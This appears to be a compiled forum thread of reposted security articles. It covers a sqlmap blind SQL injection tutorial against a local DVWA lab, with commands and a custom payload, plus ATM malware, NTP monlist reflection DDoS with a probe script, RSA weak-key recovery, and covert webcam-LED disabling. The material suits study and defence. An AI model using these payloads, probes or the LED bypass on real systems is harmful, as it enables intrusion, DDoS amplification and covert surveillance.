?>[/phpcode] Basically, this code receives an ID composed of a numerical value followed by the string "-BR". The application first validates that this suffix is present and extracts the numerical value. Then it concatenates this value into the SQL query used to check whether it is a valid user ID and returns the result ("User exists!" or "Unknown user!"). This page is clearly vulnerable to SQL injection, but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 --risk=3 -p id I'm using a valid User-Agent and an authenticated session cookie. I'm also forcing sqlmap to test the "id" parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it. To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical blind SQL injection instance and I'm lazy, so I don't want to exploit it manually.
For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection. http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit# http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit# Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is: id=1' AND 1=1 #-BR Sqlmap Tweaking How do we force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let's try it with debug information (the -v3 option): ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v3 I'm still not having any luck. To check what's going on, we can increase the debug level or set the --proxy="http://localhost:8080" option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed on the command line, so every query looks like this: id=1' AND 1=0 -BR. Obviously, that is not working. Below is how you should handle this situation. The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file and you can add your own tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it.
Here is the new test I added to my payloads.xml file:

<test>
    <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>AND [INFERENCE] #</vector>
    <request>
        <payload>AND [RANDNUM]=[RANDNUM] #</payload>
    </request>
    <response>
        <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison>
    </response>
    <details>
        <dbms>MySQL</dbms>
    </details>
</test>

This test simply forces the use of the # character (the MySQL comment) in every payload. The original test was using the <comment> tag as a sub-tag of the <request> tag; as we saw, that does not work with suffixes. Now we explicitly include this special character at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payloads.xml file, but here is a summary of the settings I used:

<title>: the title... duh.
<stype>: the type of test; 1 means boolean-based blind SQL injection.
<level>: the level of this test, set to 1 (can be set to anything you want as long as you set the matching --level option on the command line).
<risk>: the risk of this test (like the <level> tag, can be set to anything you want as long as you set the matching --risk option on the command line).
<clause>: in which clause this will work; 1 means WHERE or HAVING clauses.
<where>: where to insert the payload; 1 means appending the payload to the parameter's original value.
<vector>: the payload used for exploitation, also used to check whether the injection point is a false positive.
<request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). Here the sub-tag <payload> has to be used.
<response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). Here the sub-tag <comparison> has to be used.
<details>: sets the database in use: MySQL.
Here the sub-tag <dbms> has to be used. Let's see if this works: Great! Now we can easily exploit this with sqlmap. Sqlmap is a very powerful and highly customizable tool; I really recommend it if you're not already using it. It can save you a lot of time during a penetration test. Posted by Christophe De La Fuente on 30 December 2013 Sursa: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs
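As a footnote on what sqlmap is automating here: boolean-based blind extraction is just a binary search per character of the secret, driven by the True/False page difference. The sketch below is illustrative only; `oracle` is a hypothetical function that would wrap one HTTP request with the condition injected between the numeric value and the "-BR" suffix and return whether the "User exists!" page came back.

```python
# Boolean-based blind extraction sketch: recover a string one character at a
# time with a binary search over ASCII codes. oracle(pos, guess) stands in for
# one HTTP request whose True/False page mirrors an injected condition such as
# ASCII(SUBSTRING((SELECT ...), pos, 1)) > guess.
def extract(oracle, length: int) -> str:
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127                    # search space: 7-bit ASCII
        while lo < hi:                     # ~7 requests per character
            mid = (lo + hi) // 2
            if oracle(pos, mid):           # "is the char code greater than mid?"
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered
```

With a real oracle, extracting a 20-character value costs roughly 140 requests, which is why getting sqlmap to do this for you is worth the configuration effort.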
19. Cash machines raided with infected USB sticks By Chris Vallance BBC Radio 4 Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year. The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs. Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Communication Congress in Hamburg, Germany. The crimes also appear to indicate the thieves mistrusted each other. The two researchers who detailed the attacks have asked for their names not to be published. Access code The thefts came to light in July after the lender involved noticed several of its ATMs were being emptied despite their use of safes to protect the cash inside. After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks. Once the malware had been transferred, they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered. To activate the code at the time of their choosing, the thieves typed in a 12-digit code that launched a special interface. Analysis of software installed onto four of the affected machines showed that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind. The researchers said this allowed the attackers to focus on the highest-value banknotes in order to minimise the amount of time they were exposed. But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo. To counter this risk, the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money.
The correct response varied each time, and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed. If they did nothing, the machine would return to its normal state after three minutes. The researchers added that the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse. However, they noted that this approach did not extend to the software's filenames - the key one was called hack.bat. Sursa: BBC News - Cash machines raided with infected USB sticks
20. Defcon 21 - Evolving Exploits Through Genetic Algorithms Description: This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning and evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections; let genetic algorithms take over and create lethal exploits to PWN sites for you! soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As a member of the team, he has participated in and won Open Capture the Flag at DC 16, 18, and 19. Soen also participated in the DDTEK competition at DEF CON 20. 0xSOEN@blogspot.com For More Information please visit: - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Evolving Exploits Through Genetic Algorithms
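The talk's core loop (mutate candidate payloads, score them with a fitness function, breed the fittest) can be illustrated with a toy genetic algorithm. This is a sketch only, not the speaker's actual code: it evolves a byte string toward a fixed SQL payload using per-byte distance as fitness, whereas a real exploit-evolving setup would score candidates against server responses instead.

```python
import random

TARGET = b"' OR 1=1 --"        # stand-in goal; a real GA has no known target
POP, MUT_RATE = 50, 0.1
rng = random.Random(0)

def fitness(candidate: bytes) -> int:
    # Lower is better: summed per-byte distance from the target payload.
    return sum(abs(a - b) for a, b in zip(candidate, TARGET))

def mutate(candidate: bytes) -> bytes:
    # Nudge a few bytes up or down; small steps let fitness descend smoothly.
    return bytes(min(255, max(0, c + rng.randint(-10, 10)))
                 if rng.random() < MUT_RATE else c
                 for c in candidate)

def crossover(a: bytes, b: bytes) -> bytes:
    cut = rng.randrange(len(a))            # single-point crossover
    return a[:cut] + b[cut:]

def evolve(generations: int = 500) -> bytes:
    population = [bytes(rng.randrange(256) for _ in TARGET) for _ in range(POP)]
    for _ in range(generations):
        population.sort(key=fitness)
        if fitness(population[0]) == 0:    # perfect payload bred
            break
        parents = population[: POP // 2]   # keep the fittest half
        children = [mutate(crossover(rng.choice(parents), rng.choice(parents)))
                    for _ in range(POP - len(parents))]
        population = parents + children
    return min(population, key=fitness)
```

Swap `fitness()` for something like "how far did this payload get, judging by the target's responses" and the same loop breeds injections instead of strings.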
21. [h=1]Attackers Wage Network Time Protocol-Based DDoS Attacks[/h]Kelly Jackson Higgins Attackers have begun exploiting an oft-forgotten network protocol in a new spin on distributed denial-of-service (DDoS) attacks, as researchers spotted a spike in so-called NTP reflection attacks this month. The Network Time Protocol, or NTP, syncs time between machines on the network and runs over UDP port 123. It's typically configured once by network administrators and often is not updated, according to Symantec, which discovered a major jump in attacks via the protocol over the past few weeks. "NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks," says Allan Liska, a Symantec researcher, in a blog post last week. Attackers appear to be employing NTP for DDoSing similarly to the way DNS is being abused in such attacks: they transmit small spoofed packets requesting a large amount of data to be sent to the DDoS target's IP address. According to Symantec, it's all about abusing the so-called "monlist" command in an older version of NTP. Monlist returns a list of the last 600 hosts that have connected to the server. "For attackers the monlist query is a great reconnaissance tool. For a localized NTP server it can help to build a network profile. However, as a DDoS tool, it is even better because a small query can redirect megabytes worth of traffic," Liska explains in the post. Monlist modules can be found in Nmap as well as in Metasploit, which includes a monlist DDoS exploit module. The spike in NTP reflection attacks occurred mainly in mid-December, with close to 15,000 IPs affected, and dropped off significantly after December 23, according to Symantec's data.
Symantec recommends that organizations update their NTP implementations to version 4.2.7, which does not use the monlist command. Another option is to disable access to monlist in older versions of NTP. "By disabling monlist, or upgrading so the command is no longer there, not only are you protecting your network from unwanted reconnaissance, but you are also protecting your network from inadvertently being used in a DDoS attack," Liska says. Sursa: Attackers Wage Network Time Protocol-Based DDoS Attacks -- Dark
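If you want to check whether your own NTP servers answer monlist before an attacker does, the probe is a single 8-byte mode-7 packet. The sketch below builds and sends it; the byte values are the commonly documented MON_GETLIST_1 request, and you should only point this at servers you administer.

```python
import socket

def build_monlist_probe() -> bytes:
    # NTP "private" mode-7 packet: version 2, mode 7, implementation XNTPD (3),
    # request code 42 (MON_GETLIST_1), zero-padded to the 8-byte minimum.
    return b"\x17\x00\x03\x2a" + b"\x00" * 4

def answers_monlist(host: str, timeout: float = 2.0) -> bool:
    # True means the server responded to monlist and could be abused as a
    # DDoS reflector; upgrade it or disable monlist as described above.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_monlist_probe(), (host, 123))
        data, _ = sock.recvfrom(4096)
        return len(data) > 0
    except socket.timeout:
        return False
    finally:
        sock.close()
```

A vulnerable server will typically answer with many 440-byte fragments in response to those 8 bytes, which is exactly the amplification ratio that makes this attractive to attackers.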
  22. Detection of Widespread Weak Keys in Network Devices Abstract RSA and DSA can fail catastrophically when used with malfunctioning random number generators, but the extent to which these problems arise in practice has never been comprehensively studied at Internet scale. We perform the largest ever network survey of TLS and SSH servers and present evidence that vulnerable keys are surprisingly widespread. We find that 0.75% of TLS certificates share keys due to insufficient entropy during key generation, and we suspect that another 1.70% come from the same faulty implementations and may be susceptible to compromise. Even more alarmingly, we are able to obtain RSA private keys for 0.50% of TLS hosts and 0.03% of SSH hosts, because their public keys shared nontrivial common factors due to entropy problems, and DSA private keys for 1.03% of SSH hosts, because of insufficient signature randomness. We cluster and investigate the vulnerable hosts, finding that the vast majority appear to be headless or embedded devices. In experiments with three software components commonly used by these devices, we are able to reproduce the vulnerabilities and identify specific software behaviors that induce them, including a boot-time entropy hole in the Linux random number generator. Finally, we suggest defenses and draw lessons for developers, users, and the security community. Download Download the conference version or the more detailed extended version. @InProceedings{weakkeys12, author = {Nadia Heninger and Zakir Durumeric and Eric Wustrow and J. Alex Halderman}, title = {Mining Your {P}s and {Q}s: {D}etection of Widespread Weak Keys in Network Devices}, booktitle = {Proceedings of the 21st {USENIX} Security Symposium}, month = aug, year = 2012 } Sursa: https://factorable.net/paper.html
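The headline result (RSA private keys for 0.50% of TLS hosts) rests on a very simple observation: if two moduli N1 = p*q1 and N2 = p*q2 were generated with so little entropy that they share a prime p, a single GCD computation exposes p, and dividing it out yields both factorizations. A toy demonstration with small primes (the paper's batch GCD over millions of real moduli is an engineering refinement of exactly this step):

```python
from math import gcd

# Two RSA moduli that share a prime factor, as happens when two devices draw
# the first prime from the same low-entropy RNG state. Toy 11- to 12-bit
# primes here; real moduli are 1024+ bits, but the attack is the same.
p, q1, q2 = 2003, 3019, 4027
n1, n2 = p * q1, p * q2

shared = gcd(n1, n2)          # recovers p without factoring either modulus
assert shared == p
print("shared prime:", shared, "cofactors:", n1 // shared, n2 // shared)
```

Note that neither modulus is factored directly; the GCD succeeds only because the entropy failure made the two keys share a prime, which is why unique, well-seeded key generation fully blocks this attack.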
23. C. Then C++. Then whatever junk your heart desires.
24. [h=3]How to disable webcam light on Windows[/h] By Robert Graham In recent news, it was revealed the FBI has a "virus" that will record a suspect through the webcam secretly, without turning on the LED light. Some researchers showed this working on an older MacBook. In this post, we do it on Windows. [h=3]Hardware, firmware, driver, software[/h] In theory, the indicator light should be a hardware function: when power is supplied to the sensor, it should also be supplied to an indicator light. This would make the light impossible to hack. However, I don't think anybody does this. In some cases, it's a firmware function. Webcams have their own wimpy microprocessors and run code directly within the webcam; controlling the light is one of those firmware functions. Some, like Steve Jobs, might describe this as "hardware" control, because it resides wholly within the webcam hardware, but it's still a form of software. This is especially true because firmware blobs are unsigned, and therefore can be hacked. In some cases, it's the driver, either within the kernel-mode driver that interfaces at a low level with the hardware, or a DLL that interfaces at a high level with software. [h=3]How to[/h] As reverse engineers, we simply grab these bits of software/firmware/drivers and open them in our reverse engineering tools, like IDA Pro. It doesn't take us long to find something to hack. For example, on our Dell laptop, we find the DLL that comes with the RealTek drivers for our webcam. We quickly zero in on the exported function "TurnOnOffLED()". We can quickly make a binary edit to this routine, causing it to return immediately without turning on the light. Dave shows this in the video below. First, the light turns on as normal; then he stops the webcam, replaces the DLLs with his modified ones, and turns on the webcam again. As the video shows, after the change the webcam is recording him recording the video, but the light is no longer on.
[h=3]The deal with USB[/h] Almost all webcams, even those inside your laptop's screen, are USB devices. There is a standard for USB video cameras, the UVC standard. This means most hardware will run under standard operating systems (Windows, Mac, Linux) without drivers from the manufacturer -- at least enough to get Skype working. Only the more advanced features particular to each vendor need vendor-specific drivers. According to this standard, the LED indicator light is controlled by the host software. The UVC utilities that come with Linux allow you to control this light directly with a command-line tool, making it possible to turn off the light while the camera is on. To hack this on Windows appears to require a filter driver. We are too lazy to write one, which is why we just hacked the DLLs in the demonstration above. We believe this is what the FBI has done: a filter driver for the UVC standard would cover most webcam products from different vendors, without the FBI having to write a custom hack for each vendor. USB has lots of interesting features. It's designed with the idea that a person without root/administrator access may still want to plug in a device and use it. Therefore, there is the idea of "user-mode" drivers, where a non-administrator can nonetheless install drivers to access the USB device. This can be exploited with the Device Firmware Update (DFU) standard: it means that in many cases, in user mode and without administrator privileges, the firmware of the webcam can be updated. The researchers in the paper above demonstrate this with a 2008 MacBook, but in principle it should work on modern Windows 7 notebook computers as well, using most devices. The problem for a hacker is that they would have to build a hacked firmware for lots of different webcam chips. The upside is that they can do this all without getting root/administrator access to the machine.
[h=3]Conclusion[/h] In the above video, Dave shows that the story of the FBI virus secretly enabling the webcam can work on at least one Windows machine. In our research we believe it can be done generically across most any webcam, using most any operating system. Sursa: Errata Security: How to disable webcam light on Windows